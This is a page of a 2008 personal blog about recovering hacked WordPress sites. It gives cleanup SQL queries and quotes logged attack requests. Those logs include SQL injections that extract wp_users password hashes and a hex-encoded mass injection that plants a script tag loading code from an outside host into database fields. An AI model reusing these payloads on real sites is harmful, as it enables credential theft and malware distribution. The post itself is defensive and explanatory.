MT.Net

There are 145 posts filed in MT.Net (this is page 14 of 15).

Routed

I’ve been working all weekend to seal up the leaks in MT.Net. I feel I’m at a point where things are pretty much back to normal. Passwords have been changed, databases scanned, files examined, and all possible patches have been applied. I went far beyond simply fixing WordPress: updating the operating system was long overdue, so I did the whole nine yards.

Lessons learned? Whenever strange behavior presents itself, don’t stop hunting until you’re sure you’ve found it all. Sometimes this means ruling every possible thing out, as its very tough (and also very foolish) to say “I’m secure.” Only time can answer that.

If you run a WordPress site, fire up a MySQL session and run this query:

select * from wp_users where user_login=”WordPress”;

If you find a “WordPress” user, delete it. It doesn’t belong there.

delete from wp_users where user_login=”WordPress”;

Also, you should not have entries in your user table with invalid dates. Delete any users that this query brings back:

select * from wp_users where user_registered like “%0000%”;

I found this page to be useful for the final cleanup.

If you’ve got an MT.Net account (for posting comments, for instance), please take a moment to change it.

Restored

Its been a busy weekend here at MT.Net. I’ve been cleaning up the MT.Net webhost after some script kiddies went wild with an exploit. I have a hunch the kiddies attacked an exploit in the Bad Behavior plugin, as the only blogs on my site that were running the BB plugin were the only ones that got pwned. There was a time when the BB plugin started acting funky and needed an upgrade, and it BB would be an obvious target for the bad guys. Fortunately I had copious backups. (I find it interesting that the BB website is offline at the moment.)

If y’all see anything out of place, give me a holla. Its possible I missed something.

More webserver attacks

Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.

Note the attempt to get the user passwords from the wp_users table:

216.83.63.254 – – [03/Oct/2008:14:30:38 -0400] “GET /xmlrpc.php HTTP/1.1” 200 42
“-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:39 -0400] “POST /xmlrpc.php HTTP/1.1” 403 9
70 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:47 -0400] “POST /wp-trackback.php?tb_id=1 H
TTP/1.1” 403 984 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:54 -0400] “GET /index.php?cat=%2527+UNION+S
ELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+i
d=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /index.php?cat=999+UNION+SEL
ECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FRO
M+wp_users+where+id=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss
6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /wp-trackback.php?p=1 HTTP/1
.1” 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 – – [02/Oct/2008:05:57:15 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1” 200 42469 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)”

Turns out its a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or its being carried out by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.
Continue reading

Anniversary

Its been nine wonderful years. Happy Anniversary, my love!

Blogging blocker

You may have noticed I don’t do much posting evenings and weekends. Its not that I don’t want to or have anything to say, its just that I’ve got an ailing laptop that’s been giving my trouble recently.

I’ve known for a while that my Thinkpad T40 doesn’t like to be run anywhere but from a desk. The moment its anything but completely horizontal it promptly zaps its memory – leaving me to reboot the system. Frustrated by its lack of portability, I took it apart last night to see if I could find any visible damage. After an easy disassembly and look-over, I cranked it back up only to have it be even less reliable than before. Now it won’t even boot consistently from a flat surface. That’ll teach me to play technician!
Continue reading

Phishing attempt is stoped

This just arrived in my inbox. Someone obviously didn’t read my earlier post:

From: “Google-AdWords-Noreply” support at google.com
To: markt at blahblahblah.blah
Subject: Your AdWords Google Account is stoped.

My account is stoped. My God, how could this have happened?

Packt lss

Looks like my blog server is currently having packet loss issues. Don’t expect much from MT.Net until these issues get resolved.

WordPress hacked

One of my umpteen million WordPress sites (but not this one) was “hacked” by an iframe hack. It was a WordPress 2.3 site which I’d waited to upgrade. Only one site and only one post had the hack, which was an iframe link that somehow got tacked on to the end. Google helpfully alerted me to the issue when it scanned my site and detected the hack. Pretty useful, that Google.

I’m still investigating how the attack occurred, as the single-post aspect makes me suspect a browser-based attack. I don’t really consider it a hack in the traditional sense, though I’m still puzzling over it. Any clues from my fellow network security gurus out there would be appreciated.

Y’all fellow WordPressers might want to check your WordPress database(s) for the issue. This SQL statement did it for me.

SELECT COUNT(*) FROM wp_posts WHERE wp_content LIKE "%iframe%";

…where you’re obviously pointed to your WordPress database.